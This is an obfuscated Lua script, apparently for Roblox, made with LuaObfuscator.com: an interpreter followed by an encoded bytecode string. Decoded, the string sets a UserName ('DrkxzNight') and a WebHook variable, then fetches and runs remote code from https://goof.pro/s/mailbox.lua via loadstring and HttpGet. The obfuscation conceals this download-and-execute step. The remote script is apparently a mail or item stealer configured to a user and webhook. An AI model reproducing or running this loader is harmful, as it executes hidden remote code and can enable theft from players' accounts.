--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=0;local v35;local v36;local v37;while true do if (v34==1) then v37=v31[3];return function(...)local v80=v35;local v81=v36;local v82=v37;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v97=0,v88 do if (v97>=v82) then v86[v97-v82 ]=v87[v97 + 1 ];else v90[v97]=v87[v97 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=8) then if (v93<=3) then if (v93<=1) then if (v93==0) then v90[v92[2]]();else do return;end end elseif (v93>2) then v33[v92[3]]=v90[v92[2]];else local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==1) then v85=(v115 + v113) -1 ;v116=0;v112=2;end if (2==v112) then for v164=v113,v85 do local v165=0;while true do if (v165==0) then v116=v116 + 1 ;v90[v164]=v114[v116];break;end end end break;end if (v112==0) then v113=v92[2];v114,v115=v83(v90[v113](v13(v90,v113 + 1 ,v92[3])));v112=1;end end end elseif (v93<=5) then if (v93==4) then v90[v92[2]]=v92[3];else local v119=v92[2];local v120=v90[v92[3]];v90[v119 + 1 ]=v120;v90[v119]=v120[v92[4]];end elseif (v93<=6) then do return;end elseif (v93>7) then v90[v92[2]]=v33[v92[3]];else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==1) then v85=(v142 + v140) -1 ;v143=0;v139=2;end if (v139==2) then for v167=v140,v85 do local v168=0;while true do if (v168==0) then v143=v143 + 1 ;v90[v167]=v141[v143];break;end end end break;end if (v139==0) then v140=v92[2];v141,v142=v83(v90[v140](v13(v90,v140 + 1 ,v92[3])));v139=1;end end end elseif (v93<=12) then if (v93<=10) then if (v93>9) then local v124=v92[2];v90[v124]=v90[v124](v13(v90,v124 + 1 ,v85));else v90[v92[2]]=v92[3]~=0 ;end elseif (v93==11) then v33[v92[3]]=v90[v92[2]];else local v129=0;local v130;local v131;while true do if (v129==1) then v90[v130 + 1 ]=v131;v90[v130]=v131[v92[4]];break;end if (v129==0) then v130=v92[2];v131=v90[v92[3]];v129=1;end end end elseif (v93<=14) then if (v93>13) then local v132=0;local v133;while true do if (v132==0) then v133=v92[2];v90[v133]=v90[v133](v13(v90,v133 + 1 ,v85));break;end end else v90[v92[2]]=v92[3];end elseif (v93<=15) then v90[v92[2]]=v92[3]~=0 ;elseif (v93==16) then v90[v92[2]]=v33[v92[3]];else v90[v92[2]]();end v84=v84 + 1 ;end end;end if (0==v34) then v35=v31[1];v36=v31[2];v34=1;end end end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v38=0 -(568 -(367 + 201)) ;local v39;local v40;while true do if (v38==(928 -(214 + 713))) then return (v40 * (732 -476)) + v39 ;end if (v38==(0 -0)) then v39,v40=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;v38=932 -(857 + 74) ;end end end v24=nil;function v24()local v41=0 + (1065 -(68 + 997)) ;local v42;local v43;local v44;local v45;while true do if (v41==(1 + 0)) then return (v45 * (16778093 -(282 + 595))) + (v44 * 65536) + (v43 * (1893 -(1523 + 114))) + v42 ;end if (v41==0) then v42,v43,v44,v45=v1(v16,v19,v19 + 3 + 0 );v19=v19 + (5 -1) ;v41=1;end end end v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v46)if (v1(v46,2)==79) then v20=v0(v3(v46,1,1));return "";else local v71=v2(v0(v46,16));if v20 then local v94=v5(v71,v20);v20=nil;return v94;else return v71;end end end);v21=nil;v18=1;end if (v18==1) then function v21(v47,v48,v49)if v49 then local v72=1270 -(226 + 1044) ;local v73;while true do if (v72==((0 -0) -0)) then v73=(v47/((119 -(32 + 85))^(v48-1)))%((2 + 0)^(((v49-(1 + 0 + (0 -0))) -(v48-((1910 -(802 + 150)) -(892 + 65)))) + (2 -1))) ;return v73-(v73%1) ;end end else local v74=0 -0 ;local v75;while true do if (v74==0) then v75=(3 -1)^(v48-(351 -(87 + 263))) ;return (((v47%(v75 + v75))>=v75) and (181 -(67 + 113))) or (0 + 0) ;end end end end v22=nil;function v22()local v50=v1(v16,v19,v19);v19=v19 + 1 ;return v50;end v23=nil;v18=2;end if (v18==3) then function v25()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==0) then v52=v24();v53=v24();v51=(773 -(201 + 571)) -0 ;end if (v51==(2 + 0)) then v56=v21(v53,1018 -(915 + 82) ,87 -(1194 -(116 + 1022)) );v57=((v21(v53,19 + 13 )==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;v51=(24 -18) -3 ;end if (v51==(1 + 2)) then if (v56==0) then if (v55==(0 -(0 + 0))) then return v57 * ((0 -0) + 0) ;else local v107=0;while true do if (v107==(791 -(368 + 423))) then v56=3 -2 ;v54=18 -(10 + 8) ;break;end end end elseif (v56==(7874 -5827)) then return ((v55==(442 -(416 + 26))) and (v57 * ((3 -2)/(0 + 0)))) or (v57 * NaN) ;end return v8(v57,v56-(1809 -786) ) * (v54 + (v55/((440 -(145 + (1040 -747)))^52))) ;end if (v51==1) then v54=(1290 -(814 + 45)) -(44 + 386) ;v55=(v21(v53,1,1506 -((2458 -1460) + 488) ) * ((1 + 1)^32)) + v52 ;v51=2 + 0 ;end end end v26=nil;function v26(v58)local v59=0 -0 ;local v60;local v61;while true do if (v59==(1 + 0)) then v60=v3(v16,v19,(v19 + v58) -((1748 -(760 + 987)) + 0) );v19=v19 + v58 ;v59=2;end if (v59==3) then return v6(v61);end if (v59==(885 -(261 + 624))) then v60=nil;if  not v58 then local v100=0 -0 ;while true do if (v100==0) then v58=v24();if (v58==(1080 -((2933 -(1789 + 124)) + (826 -(745 + 21))))) then return "";end break;end end end v59=1424 -(217 + 413 + 793) ;end if (v59==(6 -4)) then v61={};for v95=4 -3 , #v60 do v61[v95]=v2(v1(v3(v60,v95,v95)));end v59=2 + 1 ;end end end v27=v24;v18=4;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v62=0;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (v62==(404 -(108 + 294))) then v67=nil;v68=nil;v62=1492 -(570 + 919) ;end if (3==v62) then v69=nil;v70=nil;v62=6 -2 ;end if (v62~=1) then else local v79=811 -(569 + 242) ;while true do if (v79~=(0 -0)) then else v65=nil;v66=nil;v79=1;end if (v79==1) then v62=2;break;end end end if (v62==(1 + 3)) then while true do if ((1026 -(706 + 318))==v63) then local v101=0;local v102;while true do if (v101==0) then v102=1251 -(721 + 530) ;while true do if (v102==(1271 -(945 + 326))) then v68=nil;v69=nil;v102=1;end if (1~=v102) then else v63=7 -4 ;break;end end break;end end end if (v63==(0 + 0)) then v64=0;v65=nil;v63=701 -(271 + 429) ;end if (v63~=(1 + 0)) then else v66=nil;v67=nil;v63=1502 -(1408 + 92) ;end if (v63~=(1089 -(461 + 625))) then else v70=nil;while true do local v108=0;local v109;while true do if (v108==(1288 -(993 + 295))) then v109=0;while true do if (v109==(0 + 0)) then if ((1172 -(418 + 753))==v64) then local v146=0;local v147;while true do if (0==v146) then v147=0;while true do if (v147~=(1 + 0)) then else v70={};v64=1 + 1 ;break;end if (v147~=(0 + 0)) then else local v171=0;while true do if (0~=v171) then else v68={v65,v66,nil,v67};v69=v24();v171=1 + 0 ;end if (v171~=1) then else v147=1;break;end end end end break;end end end if (v64==3) then local v148=1322 -(1249 + 73) ;local v149;local v150;while true do if (v148~=(1 + 0)) then else while true do if (v149~=0) then else v150=1145 -(466 + 679) ;while true do if (v150~=0) then else local v179=0 -0 ;while true do if ((0 -0)==v179) then local v186=1900 -(106 + 1794) ;while true do if (0==v186) then for v195=1,v24() do v66[v195-1 ]=v29();end return v68;end end end end end end break;end end break;end if (v148~=0) then else v149=0 + 0 ;v150=nil;v148=1;end end end v109=1 + 0 ;end if ((2 -1)==v109) then if (v64~=0) then else local v151=0 -0 ;local v152;local v153;while true do if (v151==(115 -(4 + 110))) then while true do if (v152~=0) then else v153=584 -(57 + 527) ;while true do if (v153==(1428 -(41 + 1386))) then v67={};v64=104 -(17 + 86) ;break;end if (0~=v153) then else local v180=0 + 0 ;while true do if (v180==0) then v65={};v66={};v180=1;end if (v180~=1) then else v153=1 -0 ;break;end end end end break;end end break;end if (v151==0) then v152=0;v153=nil;v151=1;end end end if (2~=v64) then else local v154=0 -0 ;local v155;while true do if (v154~=(166 -(122 + 44))) then else v155=0 -0 ;while true do if (v155~=0) then else local v172=0 -0 ;while true do if (v172==(1 + 0)) then v155=1;break;end if (v172==0) then for v182=1 + 0 ,v69 do local v183=0;local v184;local v185;while true do if (v183==1) then if (v184==(1 -0)) then v185=v22()~=0 ;elseif (v184==2) then v185=v25();elseif (v184==3) then v185=v26();end v70[v182]=v185;break;end if (v183~=(65 -(30 + 35))) then else local v188=0 + 0 ;while true do if (v188==(1257 -(1043 + 214))) then v184=v22();v185=nil;v188=3 -2 ;end if (v188==1) then v183=1;break;end end end end end v68[3]=v22();v172=1;end end end if (v155==(1213 -(323 + 889))) then for v175=1,v24() do local v176=0;local v177;local v178;while true do if ((2 -1)==v176) then while true do if (v177==(580 -(361 + 219))) then v178=v22();if (v21(v178,1,1)==(320 -(53 + 267))) then local v189=0 + 0 ;local v190;local v191;local v192;local v193;local v194;while true do if (v189~=(414 -(15 + 398))) then else v192=nil;v193=nil;v189=984 -(18 + 964) ;end if (v189==2) then v194=nil;while true do if (v190==(7 -5)) then while true do if (v191~=2) then else local v199=0 + 0 ;local v200;local v201;while true do if (v199==1) then while true do if (v200==(0 + 0)) then v201=850 -(20 + 830) ;while true do if (v201==(1 + 0)) then v191=3;break;end if (v201==0) then local v210=0;while true do if (v210==(126 -(116 + 10))) then if (v21(v193,1,1 + 0 )~=(739 -(542 + 196))) then else v194[3 -1 ]=v70[v194[2]];end if (v21(v193,1 + 1 ,2)~=(1 + 0)) then else v194[2 + 1 ]=v70[v194[7 -4 ]];end v210=2 -1 ;end if (v210==(1552 -(1126 + 425))) then v201=406 -(118 + 287) ;break;end end end end break;end end break;end if (v199==0) then v200=0;v201=nil;v199=3 -2 ;end end end if (v191~=(1121 -(118 + 1003))) then else local v202=0 -0 ;local v203;while true do if (v202~=(377 -(142 + 235))) then else v203=0;while true do if (v203==(0 -0)) then v192=v21(v178,2,3);v193=v21(v178,4,6);v203=1;end if (v203==1) then v191=1 + 0 ;break;end end break;end end end if (v191==1) then local v204=0;while true do if (v204==0) then local v208=0;while true do if (v208==(977 -(553 + 424))) then local v209=0;while true do if (v209==(1 -0)) then v208=1;break;end if (v209==(0 + 0)) then v194={v23(),v23(),nil,nil};if (v192==(0 -0)) then local v211=0 -0 ;local v212;local v213;while true do if (v211~=0) then else v212=0;v213=nil;v211=2 -1 ;end if (v211~=(1 + 0)) then else while true do if (v212~=(0 -0)) then else v213=0;while true do if ((753 -(239 + 514))==v213) then v194[3]=v23();v194[4]=v23();break;end end break;end end break;end end elseif (v192==(1 + 0)) then v194[1332 -(797 + 532) ]=v24();elseif (v192==2) then v194[3 + 0 ]=v24() -(2^16) ;elseif (v192~=(2 + 1)) then else local v220=0;local v221;local v222;local v223;while true do if (v220~=(0 -0)) then else v221=1202 -(373 + 829) ;v222=nil;v220=1;end if (v220==1) then v223=nil;while true do if ((731 -(476 + 255))==v221) then local v226=0;while true do if (v226~=(1130 -(369 + 761))) then else v222=0;v223=nil;v226=1 + 0 ;end if (v226~=(1 -0)) then else v221=1 -0 ;break;end end end if (v221==1) then while true do if ((238 -(64 + 174))~=v222) then else v223=0 + 0 ;while true do if (v223==(0 -0)) then v194[3]=v24() -((338 -(144 + 192))^(232 -(42 + 174))) ;v194[4]=v23();break;end end break;end end break;end end break;end end end v209=1 + 0 ;end end end if (v208==(1 + 0)) then v204=1 + 0 ;break;end end end if (v204==1) then v191=1506 -(363 + 1141) ;break;end end end if (v191~=3) then else if (v21(v193,3,3)~=1) then else v194[1584 -(1183 + 397) ]=v70[v194[11 -7 ]];end v65[v175]=v194;break;end end break;end if (v190==1) then local v198=0;while true do if (v198==(1 + 0)) then v190=2 + 0 ;break;end if (v198~=(1975 -(1913 + 62))) then else v193=nil;v194=nil;v198=1;end end end if (0==v190) then v191=0;v192=nil;v190=1 + 0 ;end end break;end if (v189~=0) then else local v197=0 -0 ;while true do if (v197~=(1934 -(565 + 1368))) then else v189=3 -2 ;break;end if (v197==0) then v190=0;v191=nil;v197=1;end end end end end break;end end break;end if (v176==0) then v177=0;v178=nil;v176=1;end end end v64=3;break;end end break;end end end break;end end break;end end end break;end end break;end if (v62==0) then v63=1661 -(1477 + 184) ;v64=nil;v62=1;end end end v18=5;end end end v15("LOL!083O0003083O00557365724E616D65030A3O0044726B787A4E6967687403073O00576562482O6F6B034O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O00120D3O00023O0012033O00013O00120D3O00043O0012033O00033O0012083O00053O001208000100063O00200500010001000700120D000300084O000F000400014O0002000100044O000A5O00026O000100012O00063O00017O00",v9(),...);
